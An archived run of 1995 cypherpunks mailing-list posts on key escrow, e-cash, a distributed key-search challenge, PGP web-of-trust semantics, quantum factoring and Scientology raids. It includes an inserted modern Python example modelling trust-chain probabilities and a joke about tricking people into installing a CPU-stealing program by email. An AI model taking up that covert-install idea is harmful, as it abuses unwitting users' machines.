warrants. Government should be viewed as George Washington did as  "a
fearful servant and a dangerous master".

A recent poll conducted by the Americans Talk Issue Foundation said 76%
of the people questioned responded that they rarely or never trust
"government to do what is right". This mistrust is well founded.  At the
same time as administration sources were saying that key escrow schemes
would remain voluntary, FBI, NSA, and DOJ experts were saying that the
schemes must be made mandatory if they were to be at all effective. If
the government is willing to lie to establish a key escrow key system,
what makes us believe that the government will not lie when applying for
warrants to use that system?


6) It is too humiliating to require a free people to participate in the
establishment of their own surveillance prisons. This is  what key
escrow requires. Consider the words of our revolutionary heritage:

	Those who would sacrifice essential freedoms for temporary safety
	deserve neither. Benjamin Franklin

	If ye love wealth greater than liberty, the tranquility of servitude
	greater than the animating contest for freedom, go home from us in
	peace.  We seek not your counsel, nor your arms.  Crouch down and 
	lick the hand that feeds you; and may posterity forget that ye 
	were our countrymen. Samuel Adams
 
Do you think that these men would approve the government's key escrow
requests?

This information can also be found at the following url:
http://www.efh.org/pgp/rant.html
- --
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMDpEYfBUQYbUhJh5AQHMtgP9HbCfKge22z/4jFi2MKLXqWkYB4vkIFsJ
43J7zdoDIRbfOeoMBNCFOGeIHGQ5TGL1+VFVhRMrzTZEPs/dciqc81O0YlnhiiIR
L7Lz06Jlzg2xLtaeaTQjrGewKTT9LeWXpqFSWtpe0xxAqaZ/11ompTAHm0A6NxhU
r4QXaBaEzfg=
=Axac
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Tue, 22 Aug 95 20:41:42 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v01520d06ac6060379f25@[199.171.88.71]>
MIME-Version: 1.0
Content-Type: text/plain


>At 2:30 AM 8/22/95, Timothy C. May wrote:
>> (An important point is that
>>in a cash economy, identity is almost irrelevant. It's only in non-cash, or
>>"account-based," economy that True Names are demanded. Lots of interesting
>>issues to discuss here, which I won't now.)

[Lots of interesting discussion deleted]

>Everyone trusts their transactions because of the difficulty of forging
>certificates.  That means that once again, a certificate has its own
>inherent worth. It speaks for itself, and when it changes hands, the trade
>is, as Eric Hughes says, "immediately and finally" cleared and settled.
>The overhead of keeping books is gone, at least for the trading parties,
>and especially for the clearing houses, who, like exchanges, just kind of
>disappear, along with any way to regulate them.  Somewhere, Joe Kennedy,
>the first Chairman of the Securities and Exchange Commission, is probably
>either crying his eyes out or laughing his head off, depending on your
>interpretation of his role in regulatory history.

In such a system, where does credit come in? If I have a certificate that
is worth X, then does the recipient know that it's from my "credit card"?
How do I obtain credit, and in what form does it exist?

Furthermore, how do we assess the value of real physical things in a system
like this?


--
Steven Weller  <Windsor Consulting Group>         +1 502 454 0054 (voice)
OS-9 Consultancy and Software                       +1 502 451 5935 (fax)
Finger for public key    00 02 3C 2F 83 76 D3 77  2A 95 E8 90 94 9A 9D 74
http://iglou.com/windsorgrp   stevenw@iglou.com or realtime@well.sf.ca.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 22 Aug 95 12:50:08 PDT
To: trei@process.com ("Peter Trei")
Subject: Re: NEXT CHALLENGE: so, when does it start?
Message-ID: <2084.9508221946@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Well, I've got the program, and I'm ready to start sweeping
> (about 35,600 keys/sec on a P5  90 Mhz NT machine - have to see
> how many I can draft for this) - I even compiled for Win 3.11 (less
> than 800 keys/sec on a 486/33 - don't think I'll bother).
> 
> I've got the challenge file from Adam's messages.
> 
> But when do we start? Have we started already? Have we completed?

Soon.  No.  And not yet.

> It's difficult to tell. There was talk of starting at 12:00GMT (about 6 
> AM here on the east coast), but there was no 'start now' message to 
> the list. At Adam's site, I can see that 'project 11fa' has been 
> completed, but the key (000000001234) looks like test data.

Yes, confusion abounds.  Dead mailer for me, Piete away for a while
(back now).  Rest assured big announce of a deadline when it is fixed,
with plenty of warning.

Perhaps a start time of day which is more convenient would be better,
also for people using WWW, few likely to be around at 6AM, perhaps
later in the day, when the time is decided.

> If I try to allocate keys, I get the 600 SLEEP 3600 message, which
> suggests strongly that the search has not started yet.

Yes, correct.  For people with the unix client, this means they can
leave the client running already, and it will sleep in 1hr chunks,
until there is something on the server to do.

> Adam, when you fix a time to start the search, could you:
> 
> 1. Send a message to the list, clearly saying so, and giving the 
> time.

Okay will do.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 22 Aug 95 13:47:09 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: C$ prize for bruting Hal's next challenge?
Message-ID: <2307.9508222046@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@netcom.com> writes:
> > [me on donating to the c$ prize fund for Hal's 2nd challenge]
> I like the idea, but there are two problems with it:
> -Not all platforms let you save e$ to a file. You got to open a shop.
> -Leaving the shop ID blank won't work. You got to use @ (wildcard) for shop
> ID to turn e$ into a bearer certificate.
>
> Get the shop going and I'll donate e$50

Okay, a quick email conversation with Mark Grant as to how one goes
about doing shops via cgi/www, and a brief bit of fiddling, and here
we are:

	http://dcs.ex.ac.uk/~aba/sslprize.html

Just click on amount to donate to the pot.  Pay in parts if the amount
you want isn't there (ie 15 c$ = 5 c$ + 10 c$).

cpunks + ecm folks + digicash enthusiasts, accepting your c$
donations now!

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 22 Aug 95 22:00:40 PDT
To: patl@lcs.mit.edu
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508222317.TAA09558@eiffel.lcs.mit.edu>
Message-ID: <199508230500.XAA23861@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

patl> Zimmermann clearly understood all of this, but I don't think he
patl> documented it properly.  In my opinion, everyone should always
patl> think in terms of man-in-the-middle attacks when signing a public
patl> key.  Mandating "True Names" is just an overconservative approach
patl> suitable for people who don't fully understand the issue.

wilcoxb> My point exactly.  My post "Stop Fixating on True Names" was
wilcoxb> an attempt to clarify things to said people.

patl> Then you didn't clarify very well; to wit:

wilcoxb> Okay now does anyone want to do any of the above two things
wilcoxb> to me?  If not then *don't* *worry* about whether my public
wilcoxb> key is signed by anyone or not.  It makes zero difference to
wilcoxb> you until such a time as one of the above motivations
wilcoxb> acquires.


You are quite right that this paragraph was unclear.  I meant "don't worry
about whether my public key is signed where signing means certifying the
mapping between my key and my physical identity.", not "don't worry about 
whether my public key is signed where signing means certifying the mapping
between my key and a perceived identity of mine.".


It is unfortunate that a PGP key-signature has such ambiguous semantics, but
again it is my fault for being unclear above.


wilcoxb> Zimmermann et al. were/are naive to emphasize the Web of
wilcoxb> Trust as a means of introducing strangers.

patl> The first paragraph clarifies nothing because it is dead wrong; the
patl> second because it is arrogant, offensive, and dead wrong.


Pshaw.  I think it's funny when people gasp in horror if you say something
disrespectful of Saint Phil.


Here, I'll say it again:  Zimmermann was naive to emphasize the Web of
Trust as only legitimate for public key<->Real-Life-identity mappings.  In
the future such mappings will be rare, while the Web of Trust will be used
extensively for public key<->virtual-identity mappings.


(The alert observer will notice that I changed some things between the first
and second invocations of the Disrespectful Assertion.  This is because when
I wrote the first version I was still confused about the ambiguity between
"Web of Trust as set of key<->Real-Life-identity mappings" and "Web of Trust 
as set of key<->identity mappings".)


patl> Given that active attacks are hard to explain and understand fully,

I'll say!  I'm having a very hard time understanding all of this clearly.

patl> the PGP docs are correct to advocate a conservative approach to
patl> signing keys.  Novices *should* be taught to take the Web of Trust
patl> seriously.  (Yes, I am retracting my own statements quoted above; the
patl> more I think about it, the more I think it is very hard to teach a
patl> novice the details of active attacks.)


Be that as it may, I still think that Zimmermann assumed that
key<->real-life-identity mappings would be the primary purpose for the Web 
of Trust when he wrote "pgpdoc1.txt".  And I think he was wrong about that.
It is not "arrogant" or "offensive" to say that someone was wrong when you
believe that to be the case.


patl> Moreover, I suspect that active attacks are more likely today than
patl> when those docs were written, which makes their advice precisely the
patl> opposite of an "anachronism".


Furthermore, Phil's advice to only sign keys which you have physically 
verified actually makes it easier for an attacker to get In-The-Middle-Of you 
and me.  This is because there is no Web of physically-verified keysigs 
between you and me.  If Phil had recommended treating public keys as being 
equivalent to net.personas, and verifying them as such, (or better yet, had 
provided a certificate mechanism to do so in *addition* to the current 
certificates) then there would be a Web of non-physically-verified keys 
between you and me, which would be much harder for an attacker to subvert.


Since you and I do not share any such Web, we are not any better off than if
we were using symmetric-key cryptography, as far as privacy goes!
(Authentication is of course another matter.)


Ah, the irony.  By insisting on maximally-strong links between each node in
the Web, you generate a much weaker Web than if you allowed weaker individual
links in greater quantity.


Thank you for your correspondence, Patrick and others.  I look forward to
more constructive interaction.


Bryce
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDq0kfWZSllhfG25AQERJAQAglcIqszrEeWmrbL1E/SxpdRK+3B8zKC9
g7H6fd6T6D8BnYv6u4wmlU+F8fyFT0V6cVa5BZ6Defmc6phvYD9wKyleuaYjRaOP
tVd8tITqpoIkmpK1+skCiV5CUl5eseKQJUlUa2LX4J8Lh9J6t9ZRm6p72ocJ88JL
hnOknxRHz/M=
=Pes4
-----END PGP SIGNATURE-----
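
The closing argument of the message above (many weaker links versus a few strong ones) can be checked on a toy signature graph. This is an added example, not part of the original post: the three webs, the names and the per-link probabilities are constructed assumptions, and certifications are assumed to fail independently of each other.

```python
from itertools import combinations, product


def connected(edges, src, dst):
    """True if dst is reachable from src along directed (signer, subject) edges."""
    adj = {}
    for signer, subject in edges:
        adj.setdefault(signer, set()).add(subject)
    seen, stack = {src}, [src]
    while stack:
        node = stack.pop()
        if node == dst:
            return True
        for nxt in adj.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return False


def chain_probability(web, src, dst):
    """Exact probability that at least one chain of genuine certifications
    leads from src to dst.

    web maps (signer, subject) -> probability that this certification is
    genuine. Every combination of genuine/bogus links is enumerated, so
    this is only meant for small graphs (2**len(web) states).
    """
    edges = list(web)
    total = 0.0
    for states in product((True, False), repeat=len(edges)):
        p = 1.0
        for edge, genuine in zip(edges, states):
            p *= web[edge] if genuine else 1.0 - web[edge]
        good = [e for e, genuine in zip(edges, states) if genuine]
        if connected(good, src, dst):
            total += p
    return total


def min_links_to_cut(web, src, dst):
    """Smallest number of certifications that must be subverted so that no
    chain from src to dst remains (0 if there was no chain to begin with)."""
    edges = list(web)
    if not connected(edges, src, dst):
        return 0
    for k in range(1, len(edges) + 1):
        for removed in combinations(edges, k):
            rest = [e for e in edges if e not in removed]
            if not connected(rest, src, dst):
                return k
    return len(edges)


# Constructed sample webs (assumptions, not data from the thread).
# 1. Strict policy, and the two parties never met a common signer: no chain.
NO_WEB = {}
# 2. Strict policy, one chain of three carefully verified links (0.99 each).
STRICT_CHAIN = {
    ("alice", "carol"): 0.99,
    ("carol", "dave"): 0.99,
    ("dave", "bob"): 0.99,
}
# 3. Loose policy: four independent introducers, each link only 0.8 reliable.
LOOSE_WEB = {}
for n in range(1, 5):
    LOOSE_WEB[("alice", f"intro{n}")] = 0.8
    LOOSE_WEB[(f"intro{n}", "bob")] = 0.8


def compare():
    """Return {name: (chain probability, links an attacker must subvert)}."""
    webs = {"none": NO_WEB, "strict": STRICT_CHAIN, "loose": LOOSE_WEB}
    return {
        name: (chain_probability(web, "alice", "bob"),
               min_links_to_cut(web, "alice", "bob"))
        for name, web in webs.items()
    }


if __name__ == "__main__":
    for name, (prob, cut) in compare().items():
        print(f"{name:6s} P(genuine chain)={prob:.6f}  links to subvert={cut}")
```

The numbers hold only under the independence assumption: paths that share an introducer fail together, and a verifier that accepts any single chain is also exposed to any single bad chain.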




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 22 Aug 95 23:01:55 PDT
To: "J. Kent Hastings" <cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508230601.XAA02627@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 AM 8/21/95 -0800, J. Kent Hastings wrote:
>Doesn't quantum coherence require molecular precision if it
>is to work on 1024 bit PGP keys? If it works, such keys can 
>be instantly factorized. It would be nice to follow that progress.

It requires molecular precision if it is to work on anything
interesting:  Cracking 1024 bit keys is a long way down the
road.

Long, long, before quantum computers crack 1024 bit keys, many
technological changes will radically and fundamentally change
human existence.

Quantum computers have many potentials far more imminent and
exciting than breaking PGP keys.  (Not that they are all that
imminent.)

Long, long, before quantum computers crack 1024 bit keys, quantum
cryptography will become useful and routine.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Date: Tue, 22 Aug 95 23:19:55 PDT
To: cypherpunks@toad.com
Subject: PGP for pine
In-Reply-To: <199508230536.BAA02012@bb.hks.net>
Message-ID: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of an addon to the Pine mailer that supports PGP? 
the only PGP software i could find required me to first compose a
letter in an editor then run it through a pgp signature program
then finally read it into my favorite mailer.

I'm looking for something that is hopefully transparent, or if not
relatively quick to do.


________________________________________________________________________
Sameer Manek                Seawolf@challenger.atc.fhda.edu         
________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Tue, 22 Aug 95 21:47:30 PDT
To: altitude@cic.net (Alex Tang)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508221656.MAA14641@petrified.cic.net>
Message-ID: <m0sl7ib-001eC5C@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Alex Tang wrote:
> 
> On Tue Aug 22 12:26:49 1995: you scribbled...
> > 
> > 
> > [stuff about running crypto screensavers]
> > 
> > It seems like there's got to be an easy way to divvy up keyspace on a
> > real time basis so that anyone with a few cycles to spare can
> > contribute them...
> > 
> > There could be a central server out there, which would keep track of
> > what keyspace needs to be swept, etc.
> 
> It seems that the SKSP protocol is a good foundation for just such a plan.

> Can screensavers such as After Dark for mac/pc access network protocols?  
> or would someone have to write a new screensaver altogether.

Afterdark is just a program that always runs in the background. You
could program a screensaver/timeslice stealer...even by modem...

And with Windows' new 'features' you can get someone to install this
at the click of a button..from an email message, Ha!....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Wed, 23 Aug 95 01:07:38 PDT
To: "cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508230807.BAA25567@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

On Tuesday, 22-Aug-95 11:00 PM, James A. Donald,
(jamesd@echeque.com) wrote:

>At 11:00 AM 8/21/95 -0800, J. Kent Hastings wrote:
>>Doesn't quantum coherence require molecular precision if it
>>is to work on 1024 bit PGP keys? If it works, such keys can 
>>be instantly factorized. It would be nice to follow that progress.

>It requires molecular precision if it is to work on anything interesting:
>Cracking 1024 bit keys is a long way down the road...[praises other
>applications]

Tim says that quantum codebreaking and nanotech ain't gonna happen, 
because of things he explained in the past on the list, now available in 
the archive. I found a great Web version of the cypherpunks archive at
http://www.hks.net/cpunks/index.html and will indeed catch up on the
quantum coherence subject.

RSA Data Security printed an article in their newsletter, by one of the 
inventors of working quantum cryptography, which stated that there is 
a risk of cracking RSA because of efficient hardware factorization. Why 
would they make this up about their own product? OK Tim, I'll catch up 
before making further comments on quantum codebreaking. 

Now about nanotech: The Moore(?) scale mentioned here says the 
processing power of hardware capacity doubles every 12 or 18 months for 
a given amount of money. In about 20 years only nanotech will be on the 
curve. Will hardware progress just come to a grinding halt then or what?
What's going on here? I thought cpunx were pro-nanotechnology.

Kent
--
Check out Neil Schulman's new book, http://www.pinsight.com/~zeus/jneil/
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 23 Aug 95 00:21:07 PDT
To: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Subject: PGP for pine and other Unix programs
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <199508230719.BAA01349@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.


My "Bryce's Auto-PGP" fits the bill.  It is an sh script so it can be
integrated without too much trouble into Pine, Elm, trn, tin, mh, etc etc.  
I have personally tested it with Pine so I know it'll work.  You can e-mail
me for a beta copy, or you can ask for a v1.0 copy if you don't mind waiting
an unspecified amount of time for beta-testing to finish.


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDrWWfWZSllhfG25AQEpXQP+ISF5DNtNa/SbceUTPzFkHLO7YFoV01+S
t91Tt488GplyFQrimqbJpRTRtdxNjt4fR7o23F9kbRkPRtD3zQPxi0/jjT29JrNU
Oi0eiteq2FpgAoevMdkfwdsVKupW2fb78jNnz2490JHM/Zr1CvOH+2bwziQ1i8hR
5y48rjUrLTE=
=DQYq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 23 Aug 95 01:17:58 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: The sorry state of non-US crypto
Message-ID: <v02120d04ac60a2a26d79@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:24 8/23/95, Enzo Michelangeli wrote:

>Try these URL's:
>
>Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
>UK:      ftp://ftp.ox.ac.uk/pub/crypto/
>Croatia: http://pgp.rasip.fer.hr/
>Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/

But how is the average non-US web surfer supposed to find them, if even
I (who at least knows about the various CP sites) can't even locate them
without asking on the list?

[Thanks for the listing, though :-]


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 22 Aug 95 22:40:47 PDT
To: cypherpunks@toad.com
Subject: The sorry state of non-US crypto
Message-ID: <199508230536.BAA02012@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just spent an hour surfing the various crypto/cypherpunks web sites. In
this hour I did not come across a single non-US site that carried anything
else but PGP. Most non-US sites just carry rants about the evil ITAR, and
a few carry the various international versions of PGP. That's it. I know
that there are several European ftp sites that have other cryptographic
software as well, but I sure as hell can't find them by browsing the web.
One would think that at least some of the major homepages (Virtual library,
etc) carry links to such sites. Who cares if someone violates ITAR, if
overseas users can't find the exported software?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDq+LSoZzwIn1bdtAQGfJAF7B/XTP5VHlvTLgVRcrDHGX9kcLOANI7OE
oQbdMFG6K9V7URHL7HV4N7EaAo+TriRp
=Ocb0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 22 Aug 95 23:54:57 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <199508230654.XAA20796@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On August 23rd, Lucky Green succinctly stated:

>Who cares if someone violates ITAR, if
>overseas users can't find the exported software?

Lucky, all we (I) can do is keep sending them the stuff.
All it takes is just one person to really learn that a
lot of folks are in this. When they do that they don't 
have to be so 'secretive' about their actions.

I just try to remind myself, "I'm just an electronic
envelope maker", that's all. I also like to think I'm
lucky enough to get a job in marketing the stuff.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 22 Aug 95 23:00:33 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <v02130515ac606c957f85@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:25 8/21/95, Timothy C. May wrote:
>When a certain character in a television show referred to "Third World
>mutants," he was also referring to "your basic brown types." (His words,
>not mine. Ten credits to anyone who can identify the t.v. show and the
>character.)

Archie Bunker? All in the Family (I think is the show title).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Wed, 23 Aug 95 03:07:36 PDT
To: cypherpunks@toad.com
Subject: Let Me Repeat, the Raids Must Be Stopped!  A PROFOUND THREAT TO FREEDOM OF SPEECH ON THE INTERNET
Message-ID: <199508231002.DAA03500@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



PLEASE FORWARD TO ORGANIZATIONS AND INDIVIDUALS SUPPORTING FREEDOM OF SPEECH
ON THE INTERNET AND TO CIVIL LIBERTIES GROUPS.


As many of you may know, the Church of Scientology (CoS), represented by the
Religious Technology Center (RTC), whose primary function is to defend their
copyrights and trade secrets, performed their third raid/seizure today
against an Internet user for alleged copyright infringement.  The prior
two were against Arnie Lerma last week, and Dennis Erlich back in February.

This raid was against FactNet, an organization dedicated to public awareness
of various groups it labels as 'cults', including the Church of Scientology,
and one of its leaders, Larry Wollersheim.

[It is interesting to note that CoS owes $4 million to Larry Wollersheim based
on an award by the courts, and affirmed by the Supreme Court.  CoS has
refused for whatever reason to pay this judgement, and did very questionable
moving of assets out of California to avoid paying.  Wollersheim has currently
deposed the leader of CoS, David Miscavige, to ask him in court what happened
to the assets of the California branch of CoS.  Mr. Miscavige went into hiding
over a year ago and so has not yet been served with this subpoena.]

This raid and seizure is technically allowed under current U.S. civil copyright
law when certain conditions are met.  Congress originally allowed such raids
to deal with copyright infringement involving bootleg material, where seizing
the equipment used to produce the bootleg materials would effectively halt
production until a court could assess the claims of the copyright holder.  I
am not sure if the Constitutionality of this law has been ruled upon, but in
my opinion it oversteps the bounds of the intent of the U.S. Constitution
regarding the bounds of search and seizure.

Congress passed this law allowing seizure (in 1976) well before the advent
of computer networks.  The rationale that CoS used in convincing a judge to
issue a Writ of Seizure is that seizing the computer equipment will halt the
continued duplication of the copyright material, allegedly in violation of the
rights of the copyright owner.  This rationale does not hold any water when
considering the Internet.  Once the material is electronically disseminated
on the Internet, seizing the computer equipment used to disseminate the
material, as well as copies of the material itself, serves no useful purpose
to stop the continued dissemination of the material.  For example, the
perpetrator of the alleged copyright infringement could, if they want to,
simply purchase/rent/use a computer with Internet access, copy the material
from another site on the Internet (which observation shows exists all around
the world regarding the CoS materials), and redisseminate it as before.  The
only effective remedy is a Temporary Restraining Order (TRO) and a lawsuit
against the individual ALLEGED to have infringed on the copyrighted material
in excess of Fair Use.

Thus, these three raids by CoS were clearly unnecessary.  Furthermore,
regarding civil liberties, they are even more troubling.  In all three raids,
the entire computer, related equipment and tapes were seized by CoS for their
erasure of the alleged copyright materials, but without ANY court oversight
which would filter out data which has no relevance to the matter at hand and
which is protected by the right to privacy and other protections.  There may
also be further protection under the Electronic Privacy Act (or whatever it
is called).  A lot of private data from many people, not related to the
alleged copyright infringements, may have been compromised.

Furthermore, these raids serve to stifle Free Speech on the Internet.  In
essence, CoS is saying to the Internet community:

     "If WE feel you are disseminating our copyrighted materials in excess of
      Fair Use (and we will define what Fair Use is), then we will get a Writ
      of Seizure allowed under U.S. copyright law and take away your computer
      BEFORE the court decides on whether you exceeded Fair Use."

And if much later the court determines that the dissemination was done under
Fair Use, then there is no "effective" and "practical" remedy other than
filing a laborious and expensive countersuit, which could drag on for years,
to the detriment of the individual originally accused of copyright
infringement.  CoS knows this, and thus they really don't fear the
consequences if they overstep their bounds in this matter.

And who wants CoS to plaster the Internet and the newsmedia with their
propaganda stating that "Federal Marshals Seized the Computer of John Doe"?
We all know that the general public may see John Doe as some criminal of
the first order because Federal Marshals were called in to handle the matter.
This also serves to stifle Free Speech.

Thus, we must call upon Congress and the courts to fix this "loophole"
allowing these unnecessary and, in my opinion, unconstitutional raids/seizures
of computer equipment for alleged *civil* copyright infringement in excess of
Fair Use.  This "loophole" is a clear threat to Freedom of Speech.

I call upon electronic freedom activist organizations, such as EFF, and more
traditional civil liberties organizations, such as the ACLU, to do something
to stop these raids.  I think asking a Federal judge to put a *temporary*
halt on all such raids pending Federal court review on necessity and
constitutional grounds.  In addition, we should call on Congress to amend the
copyright laws to take into account the special aspect of computer networks so as to
not allow the trampling of civil liberties that we've seen with the barbaric
CoS raids.

If you agree with me, do forward this to your Congressperson, to anybody you
know involved in civil liberties issues, religious leaders, etc.  Become
aware and concerned.  If you live in the U.S., you could be the next person
raided just for exercising your right to Free Speech.

Thank you for listening.

Jon Noring

****************************************************************************
For more information on the Scientology versus Internet "war", check out
both alt.religion.scientology on Usenet, and the following Web site, which
has links to nearly all Web pages devoted to the Scientology issue:

http://www.cybercom.net/~rnewman/scientology/home.html
****************************************************************************


-- 
OmniMedia              | The Electronic Bookstore.  Come in and browse!  Two
9671 S. 1600 West St.  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
South Jordan, UT 84095 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
801-253-4037           | E-book publishing service follows NWU recommendations.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 23 Aug 95 01:35:50 PDT
To: cypherpunks@toad.com
Subject: MD5 in DOS
Message-ID: <199508230815.DAA29613@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


cpunks,

im looking for a md5 binary that will run on dos.  can anyone give me a pointer?



10x







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 23 Aug 95 03:28:04 PDT
To: cypherpunks@toad.com
Subject: Applied Cryptography, Second Edition
Message-ID: <199508231027.FAA25650@klondike>
MIME-Version: 1.0
Content-Type: text


The second edition to APPLIED CRYPTOGRAPHY will be published in November.

This is not just a correction, it is a major update.  There are 50% more
words in the second edition.

The second edition will be published in both hardback and paperback.  Wiley
is jacking the price a bit, so I am offering a 15% pre-publication discount.
Details will be forthcoming when I invent them.

Attached is the table of contents.

Bruce

**************************************************************************

APPLIED CRYPTOGRAPHY - SECOND EDITION    
by  Bruce Schneier


Foreword by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; Steganography; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; Authentication and Key
          Exchange; Formal Analysis of Authentication and Key-Exchange
          Protocols; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; Designated Confirmer Signatures; Proxy
